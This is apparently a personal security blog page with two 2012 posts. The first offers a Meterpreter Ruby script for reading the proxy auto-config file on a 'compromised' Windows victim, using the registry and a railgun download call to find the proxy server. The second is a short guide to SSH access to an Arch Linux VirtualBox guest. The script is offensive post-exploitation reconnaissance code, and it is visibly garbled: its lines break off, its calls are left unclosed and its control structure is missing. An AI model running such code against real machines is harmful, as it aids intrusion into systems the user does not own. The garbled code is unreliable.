Sunday, 12 February 2012

Reading proxy auto config (pac) file with meterpreter

Since i am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following meterpreter script is an example of reading proxy auto config file (pac) to check for the proxy servers being used by compromised machine.

Tested on Windows XP only.
#This is just a concept of reading pac file from the compromised machine.
#You can take the stuff ahead from here :-)

#Variable initialization
session = client

if session.platform =~ /win32|win64/

           #Read the key and the get the AutoConfig URL
           open_key = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion
                      \Internet Settings', KEY_READ)
                 url = open_key.query_value('AutoConfigURL').data
                 print_status('Reading pac file.....')

                 #Download the pac file
                 session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD', [['PBLOB', 'pCaller', 'in'],

                 #Read the file and search for the proxy servers
                 proxy_data = ''
                 temp ='proxy.pac','rb')
                 until temp.eof?
                           proxy_data <<
                 proxy_host = proxy_data.match(/PROXY(.*)";/)[1]
                 print_status('The proxy server is:'+proxy_host)

                 print_status('No pac file found')

           print_status('Victim is not using Windows')

I never did code in ruby before so any suggestions are welcome.

Wednesday, 8 February 2012

SSH access to archlinux guest in virtualbox

For me having metasploit framework installed on headless and light operating system whose memory thirst can be quench with 50-80 MB RAM was a point to install arch linux.

This post shows quick dirty steps to configure virtualbox to access SSH on arch linux guest with NAT.


Host : Windows
Guest: Arch linux 64bit
VirtualBox: 4.1.8

Poweroff your guest operating system. Go to settings of your guest and select Network. Setup Adapter1 as NAT and Adapter2 as Host-Only Adapter. Refer following screenshots

Ipconfig on my windows host shows the following configuration

PowerOn your guest. Login as root user and setup another interface with the following command

ifconfig eth1 inet netmask up

From your host system, you now will be able to ping and can even ssh with your ssh client like PuTTY.